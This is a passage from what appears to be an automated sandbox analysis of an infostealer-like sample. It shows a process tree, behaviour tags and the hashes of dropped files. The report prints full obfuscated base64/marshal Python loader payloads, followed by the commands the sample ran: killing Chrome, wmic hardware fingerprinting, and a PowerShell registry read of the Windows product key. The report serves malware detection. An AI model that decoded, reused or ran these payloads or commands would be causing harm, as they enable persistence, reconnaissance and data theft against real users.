hGGx5DQwRHoQmjA7NwpTYYaXqEIyUJCle7zHB56gBgaIvMYbaPUncMtD7HlTrsLcrY3t7L8-G5gDpSVfqHO-viqF1MWrAbzDsYtGYpgJCDRZrJUhdgqKHv9PIPG3DyMxHl0V21jFJgX3BWuIVCh5LQRopdG6xylKWbtNkVcKK3DpfZjIx4Y2HoK9I9w3OcSKhVL9Xuea4NDt0pLg_3zBv8aq4fiKqWIqM7irFGrlgAzfptmmTbBZbTg5BU7FUlGwbUv5jnkNkUJYNfX_WEi4hIK7YPnFVqqQFY0poBEdRXpiLtNrNm4wWJ4GUfgv7_XoFAKjwOCenkq9x82gfU0OWAMv2bU3b6V29fJPWmHZz921q5JDOjfd-TAA9bxUjF_FRVh9IVcI0FgpXqW4ux2KSSm6CR50EiObd8zmQCg5LjEUjx-3M7voHyutsmi1yR6E-nY996lmue4cDgg-zKJeL463E5EWU28DVWOfxaiqQKtbFTcf9omiHrMYP2GpBXLEPdm8brfYk_ZyfG2hka0M8cI3UOM1IZlsvf8SzvaUWkmHmFtQjiORpNwsUkJr9dAhE_dYtAGn0AzZmV8G2M73hqCK37gi6Wi8DMjL2aSyQSxfhtkzAsC6KBs8_MLzartCEu92HqM6pmgYi5MjzLSADJdmWY0VAflSdodItnwnywqUjpfWkRty-Mkw57fIzlyW29nzGR725RbQYgrIvX3n52yYyTpUByjre-k1UkeEI76DreIoYpvO0uyOQ1BG9dkYEzX9WuoRcim6N9OBtbPToqJzx9_Wh5hZLDQzIs4jJzWZS9rP5SlUPkVs-vFIDTphQePI0V0MjmEaZe2CjnoSrBQPwnZkOMGZLZHL_Midw3BP_Qy39y4sdEgPbkSw2nkcICB8RF9OXsl51dBCPjG8b4QiXrZ2Qd3eKR8JNyP8ZMqM2B597eHQfnL7Wr_zlHMefR9BXv6Ho0PEoB4l-IEGiYXlbj6vCCJJ4HNDVCH_CU8bV3xuTl8f1vBccl-gSyPNbnXWoKDgxF90wDVYKlFL9EDGcdawSX3not6nZfj16kjYWx6-j8St4_RR99sExUXjGzcZu9VF9_7WG7fC4Pu8OAOPH27BzHY1x1Wdu2cq6SqOnztXoIqSAndLHSQ_fmTghtkvDAyxyc4q0MRg-Ox00YaWiBk3LDXmkQWtUyzg5SdRRgDyAsJ0TJFHH3TjGqtyNRs47LE0dwZRghDxj1Xf6dpmL59SLoGgIjBBd71JcajVejHJ6WxKMqV1lutDk28NHfzEfOe24l8ybRf68PAI_oqN4Yb22XiYeSIKBsPfhOCAGYIMXmU9-gbCsXn2zQf0UKygDvE90x_IZkRf0qmsudPKR0elHyWKwPuwVQwLvDUclQtDQnkQNh_IITfRQV5eyTmGHKdUTc4FLtlrFWmX2KcjV461Ov7TwP2rnIkoPJOU2OKMAB2DVZoWzdyZHJdVYQqpdJZOcyLmMCIEWgYMr1kKNoFP-y-YU0-OCSRRxd30lew1_zrUsvcRR9yXkZI880hV179liLWNuZIJUvsipySYtYCXT5BfoNA_mdbwf2X55LPh1MsRisAs_r370g8qtjxxFVIaLuvuAtobNbz6YRWACWiK2YL1_9ZgTgU9PesY0Up92r7sXStjhGy2CesyHduEPQ3BxQOsPOOnDCPcFGx67HoAfMMZJVCRU01b_zeHWIaIBJJ0USxUwu9CHAam58GmN6wwlSWBfaYo2crNq1IOUjxroB8r97_NwfTwaoQ_9FF9UsvZc97ZJhseSfawbVmJ51xpw_wQg8UCNN8KrsGTGBKQlH1eLQWQz4DnSvTS4-EFij2Md104DxbuJXjtPO-aIGheWWkxIjGg5HnJdZHuK7smweKBB2cDXAc4K1MS6WzBq3SU5nyWtwHVY72R0ES0Z8FXro7TNzFNoCDbahkXHC_7ulqmFo80u17QStdfzX4GGDFFlHFBMcaxbQDzP1Y3T2gQIJ5CaaQTKo0gPbpsr1WSvmn9b6qS_sEeyn_7pXA7VmcAVFSYHvVxIdRXAzq3PuGTLYRcLRvJINA-z3rAVr6IYkT5U_QUd7lalY0mk0vSJrYZLoAkPYojNWK0HbBXxc2k9dl5UlFT4USKNrhXv9AYTVLyE2v2A2H0NgR6Z7IMWOEhZfCfrBZyBM-abrNiSRVZnq5aRzMh-LaTDv_naRtLEhw32NdlJgPdYgSCtudBEcJmdK0ddqag8Wg12zm7oDmaEa-WvcpAZ81XGhZa-1__xFi2nSd41e_HXpF0nYJEU3yAjOZ-NHRVsPD19gMtVOqNRiU0WzSvyXceAqRP6TjfnCSvaiCzA4QYf7-FcQmjYx5nfkoax4vyD1lehzrZfLc8tRFzDKuN8K2o3VavimYHvaYX4Dk3cGIRgJrsuUX-aQPW6X6l2lj2pR1RK77ArrkVQp451Zqss7Hz7AbwDVws5iizRvz9KsPvhYOImU0dNg7MC3rx2hQcuyg=='))"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:3568
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oES1lDTNoFTkhBWFfaBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));KYCL(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhHAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEdTTVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDBRMnBYVWh3QlZtc0VaQVZOZUh4SGF3RjlSbE5wV0J0OVhHaGJUVjBiWEVweWMwSlZkbkpZVTBCZ1ZtQmFlRWxNWFhnQmNseFRRVkY1U0VKNGQyQk9TbWQ3Qm0xWWNGVitiWEllVTBCYUIzRmViMWRuYzI5V2VIRjJTV3BwWmtSU1gxNUFTbmhqVjM1aWMwdHRkbllmYW5aL0FWRk9HMTUwYUg5ZWVGOWZIbFJtY2xSK1dBcEJUVjFvQTJKY1ZVSlRhVmdmYVVCblMyaHZaRnBNQWhzQmEyVUNIbnhEZmxoVFlnc0RkMTBYQUV4bWQwZDRlbHNiZjMwSVJWQmtGMGwwWjNSTGZRQmZRbWw1WWxSOUF3TmZUMmNhUm45ZlkyVmxlMTliVkdaWkFYdGVSVVZLZDNnRlZYTllTWGx0Y1VsNGNuTlFaM2Q0QkhSbWZGMWxRMlpYVWtObkFYbHdaMTVqWjFaWWZHUjlZbEpvZG10bkEyUmZZMllYQUhsbGQzdDdlSGxVWjJnSUFsTUZad05LWjFaRmZ3TmZIbUpyWmtCbmRsVUhTbmRhWVhsbEFWeDhmUVZGYW5sL1NGZHZiQUJsZDN4ZGFBRjlHMU5tWWxSNllsbDhaM052VjJkeWNGVitiWEpIVTBObldWTkFRVmRuYzI5V2EycGZSR3AyY2g1NGRHUURkd0o0UjBwMlhVUlZSM0pHVTFkelhYMVFRVmRuYzI5V2VIRjJTWGxtY2taU0FuOEt4ekl1TUM0WU4rZ3hURkZkVlJnRjZ6ZEZUMTVKVmZRd1dPZ3pTMGhMVS9RNFV3UURTbFZOWDBwVTZ6ZEhYRmxBUkljeHdqSTNMakQwTmx0RFgxTmFTOG9tREVOZVZVZGJTdzVjUFM0eE1UTTNMakJkWEM0eE1jSTBMekV2NkM0OHNUKzNJN0FqNkNjL3VTZS9YN2sydkRiQk1URTJJOEF1TXk4OHNYUHZLaml1ZFA0NEtMb2gramszd0M0eEttc3czekF1T25RMnhUSTNKR29wd1M0eE5Ha3cyakF1TlhVMndUSTNLMnNwNkNJOHNYZnZKVHl1ZEs1MXdUVTBMejNlTUMwd1BFQThMakF1KQ7aBXN0YWdl2gRleGl0cg8AAADaB21hcnNoYWzaA3N0cnIZAAAA2gpiYWNrX3ByaW502gVwcmludNoJYmFja19leGVj2gRleGVj2g5kZWNyeXB0ZWRfZGF0YdoES1lDTNoFbG9hZHNyEAAAAHIGAAAAcg4AAAByDAAAAPoIPG1vZHVsZT5yJQAAAAEAAABzrQAAAPADAQEB2AMIiEWCPvAAAQEL2AQIgESBRoRGgEbgABbQABbQABbQABbQABbQABbQABbQABbwAgUBGYhj8AAFARmgA/AABQEZ8AAFARnwAAUBGfAABQEZ8A4ACROABdgHEIAE2BEVkBSQa/AAACRCEfEAABJDEfQAABJDEYAO2AAEgASAXYBXhF3QEyOQNtQTI6BO0RMz1BMz0QU01AU00QA11AA10AA10AA10AA1cg4AAAA=')))
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3520
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "taskkill /f /im chrome.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3908
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /f /im chrome.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4672
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4324
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic os get Caption
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2828
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1176
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic computersystem get totalphysicalmemory
            5⤵
            • System Location Discovery: System Language Discovery
            PID:5072
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1848
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3664
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4900
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:5084
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1504
          • C:\Windows\SysWOW64\Wbem\WMIC.exe
            wmic path win32_VideoController get name
            5⤵
            • System Location Discovery: System Language Discovery
            • Detects videocard installed
            PID:4976
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4516
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2852
      • C:\explorerwin\python.exe
        "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oEWEZTTdoFSFRHV03aBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));XFSM(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhHAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEdTTVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDBRMnBYVWh3QlZtc0VaQVZOZUh4SGF3RjlSbE5wV0J0OVhHaGJUVjBiWEVweWMwSlZkbkpZVTBCZ1ZtQmFlRWxNWFhnQmNseFRRVkY1U0VKNGQyQk9TbWQ3Qm0xWWNGVitiWEllVTBCYUIzRmViMWRuYzI5V2VIRjJTV3BwWmtSU1gxNUFTbmhqVjM1aWMwdHRkbllmYW5aL0FWRk9HMTUwYUg5ZWVGOWZIbFJtY2xSK1dBcEJUVjFvQTJKY1ZVSlRhVmdmYVVCblMyaHZaRnBNQWhzQmEyVUNIbnhEZmxoVFlnc0RkMTBYQUV4bWQwZDRlbHNiZjMwSVJWQmtGMGwwWjNSTGZRQmZRbWw1WWxSOUF3TmZUMmNhUm5SY1ZYZGdlME5iVkdaWkFYdGVSVVZLZDNnRlZYTllTWGx0Y1VsNGNuTlFaM2Q0QkhSbWZGMWxRMlpYVWtObkFYbHdaMTVQZHhkcllHUjFIMVY3ZlJ4aWQzUmtUMTEwV0gxMldrWmhIWDBjWkdzRVoyTmlGMlY4WFdoemZXcGZHbVZYQUJ0U2VYaCtlM1VmVm54bEFWeDhmUVZGYW5sL1NGZHZiQUJsZDN4ZGFBRjlHMU5tWWxSNllsbDhaM052VjJkeWNGVitiWEpIVTBObldWTkFRVmRuYzI5V2EycGZSR3AyY2g1NGRHUURkd0o0UjBwMlhVUlZSM0pHVTFkelhYMVFRVmRuYzI5V2VIRjJTWGxtY2taU0FuOEt4ekl1TUM0WU4rZ3hURkZkVlJnRjZ6ZEZUMTVKVmZRd1dPZ3pTMGhMVS9RNFV3UURTbFZOWDBwVTZ6ZEhYRmxBUkljeHdqSTNMakQwTmx0RFgxTmFTOG9tREVOZVZVZGJTdzVjUFM0eE1UTTNMakJkWEM0eE1jSTBMekV2NkM0OHNUKzNJN0FqNkNjL3VTZS9YN2sydkRiQk1URTJJOEF1TXk4OHNYUHZLaml1ZFA0NEtMb2gramszd0M0eEttc3czekF1T25RMnhUSTNKR29wd1M0eE5Ha3cyakF1TlhVMndUSTNLMnNwNkNJOHNYZnZKVHl1ZEs1MXdUVTBMejNlTUMwd1BFQThMakF1KQ7aBXN0YWdl2gRleGl0cg8AAADaB21hcnNoYWzaA3N0cnIZAAAA2gpiYWNrX3ByaW502gVwcmludNoJYmFja19leGVj2gRleGVj2g5kZWNyeXB0ZWRfZGF0YdoEWEZTTdoFbG9hZHNyEAAAAHIGAAAAcg4AAAByDAAAAPoIPG1vZHVsZT5yJQAAAAEAAABzrQAAAPADAQEB2AMIiEWCPvAAAQEL2AQIgESBRoRGgEbgABbQABbQABbQABbQABbQABbQABbQABbwAgUBGYhj8AAFARmgA/AABQEZ8AAFARnwAAUBGfAABQEZ8A4ACROABdgHEIAE2BEVkBSQa/AAACRCEfEAABJDEfQAABJDEYAO2AAEgASAXYBXhF3QEyOQNtQTI6BO0RMz1BMz0QU01AU00QA11AA10AA10AA10AA1cg4AAAA=')))
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetWindowsHookEx
        PID:2760

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pibpweew.kqg.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\completetedv.mp4

    Filesize

    4.5MB

    MD5

    092cf575b7f02a8f1134e9f8c42f21da

    SHA1

    6c905a01fc2ec8e82c871d7adcb0c701316a1747

    SHA256

    cac55350c5aa107bc491b26e1b4331e40149d20b63a026af9ef63c0a2dbc148a

    SHA512

    5822615439d291a0527c59910c541ef963773a5c402a0265160a9815064fdcd01c7c943c5686b2bc51f6414ba755ae787c8c3b61c6debe9e7e465f12ff4c014f

  • C:\explorerwi\explorer.exe

    Filesize

    48.1MB

    MD5

    b480a93a49edffc263f7d195fc42adb7

    SHA1

    3c6e8b605240a08a807b0b25968d9971c1702d80

    SHA256

    5665635c917856a9f648a34cf5a3b94ed97c154eaeca7d84d1ae132f20a1abfa

    SHA512

    85a012690938dbc1f4ac0e02d3d25634cfd41dba9d337331ff0243f8de8ac90d9253242c5f8c0867a71132809f234c23332852b04e58973fdd7aea99a5494592

  • C:\explorerwi\mewmew.dll

    Filesize

    48.8MB

    MD5

    0f5bcc181b23afbe53e7d80c571b57f6

    SHA1

    3307b340dec557795e3018f5f6402707c2662a15

    SHA256

    89ca59179f1620d5a1b6b54781fb1c76af38b30f9130cc4f9ead6594f6480ac3

    SHA512

    a8f6d93887819ff95243f99ee3abf1cc5fc32e46c12b7e5a1a5e0cbf7c77e90622dfec67729bc2bb25804409e0533eb0a44fb664cc57240d4885d3d6798dfd94

  • C:\explorerwi\pdl.exe

    Filesize

    652KB

    MD5

    e03754c42886bf97f089bf33b4fc85db

    SHA1

    7b1cd72664855f307f520cbc985454b64e0a59cb

    SHA256

    db10d8865d945af37547ff28e24f7ab32ffc73d38ddba0d12223f5a4018addb9

    SHA512

    515c043810c7c039f69229f2d27a503d68f87b21ec0b4ae373f7893a99f6251bee40931a3b82cf9c00b5dac0f342dcfba23384be17928d9ecc7ccb1aa7dfeda8

  • C:\explorerwin\Lib\__future__.py

    Filesize

    5KB

    MD5

    7db961704ab133d2b2794b860dd043bd

    SHA1

    8dec0f7ee73f28b789e2d42c85f23a1e52aa361f

    SHA256

    bf11d13b6c9b2b8706be425addf399965738622bb4cc553217be16399c51d51a

    SHA512

    ef15aee508686b41348b66956eab6b863ba789063e8adc3d917aa75afffe664bb22efdb73242be24ba7c595b235ef43688f314cb76b9759119597d8175f96384

  • C:\explorerwin\Lib\__pycache__\__future__.cpython-311.pyc

    Filesize

    4KB

    MD5

    00fc29ce1bd84e3ead06236e85c4f469

    SHA1

    12ca8cc7e6ca975343e08ce86b90c5255db899a1

    SHA256

    c62485af1078879552c09eacb993fe2ad1d94f04e443e8ca6cb681416d11f9f1

    SHA512

    6de69f06e8eda4a06f5e875235cdd4eb7b5d8eb3c79527209b1dcf9a4b842cfa8c441661b7174268be01cb8f7bae9cc8534b248e71b0eb878af54945ed716564

  • C:\explorerwin\Lib\__pycache__\base64.cpython-311.pyc

    Filesize

    27KB

    MD5

    c98c8d4de71093bdbfd843c4009a5aa9

    SHA1

    7fcc90f7e4b1c8392fe4e4f5b6243db477a59840

    SHA256

    c9b13454db31e9c85b3d686f56c662f16398ec883aaa50bbac1cb8ca33bbb206

    SHA512

    22a7b32ca1d854125aabd3e908933ade986395f897b4b86cad15205c0aeb5feb2e38f6f9aec231c2d4c7c77a59a7cff17bccc96359c902198d4b9478151052cc

  • C:\explorerwin\Lib\__pycache__\copyreg.cpython-311.pyc

    Filesize

    8KB

    MD5

    07c15617af5cb4a4c2bf89af9a3a8db1

    SHA1

    d51e33440995632df409db224a6e7f06233eebb1

    SHA256

    ae3947e672a4b664fd8f0cc4090f1e213cd72df90fdb806f6be000c22425916b

    SHA512

    dbb8af8511349ea7876b19cb4114a3b07ad6538eeb2820496b477fa58814970ce0c8f7576aadfad64ac108beee02f1bb5ccb4d48a6c890a52c53764f224689fc

  • C:\explorerwin\Lib\__pycache__\enum.cpython-311.pyc

    Filesize

    83KB

    MD5

    66b119145b8c77e4ecc3164d45022a41

    SHA1

    1978d5cded908a229ffeee86df20d2dbfcea2be1

    SHA256

    06e60ac203e5cefa3f9c0d6fa02907953ac459a174c4a13a8c2d370f17be2e35

    SHA512

    0ede0a4e41d7dfaefb8d5cd712893d7a93e69c347fb1b9f9be6f78cbc4b697ffa2ff3346d8b9ee91b30d710ccbb04e3a21eacf9a4e7d39d19d66de6a824427ab

  • C:\explorerwin\Lib\__pycache__\functools.cpython-311.pyc

    Filesize

    45KB

    MD5

    2ff6c1d4c7cedf8878f4ef1f4262bb49

    SHA1

    ba105443574a26448c1bd3bce605aabe90751532

    SHA256

    4d57178334c221f35b14591e17c290129fa400d3c2061ce8984e9bef671b8fc7

    SHA512

    02ed8d33c379c570c3beab9b1d00801318baea7aaa52c6d9b23cacb418eed2e932c32b654a7b3893a5bd6e919ce5e152400cd884f2b886289d01058684bfcab2

  • C:\explorerwin\Lib\__pycache__\keyword.cpython-311.pyc

    Filesize

    1KB

    MD5

    abab62a8820d5120da1ddd237cdd8883

    SHA1

    3b4f91e54819b8213e58272c1c033aa37d570831

    SHA256

    a195bf38b9f6b523f4b68ca2a48fa72a28981338944940da127bd34cc7abb82a

    SHA512

    84fccef06f76f640cb349c0df79e336adc6347842eb147fd82098012f0c15a3bc31acc604c28da068db6c625f01f9015ab0a9fbeeb682839c625da1f753db70c

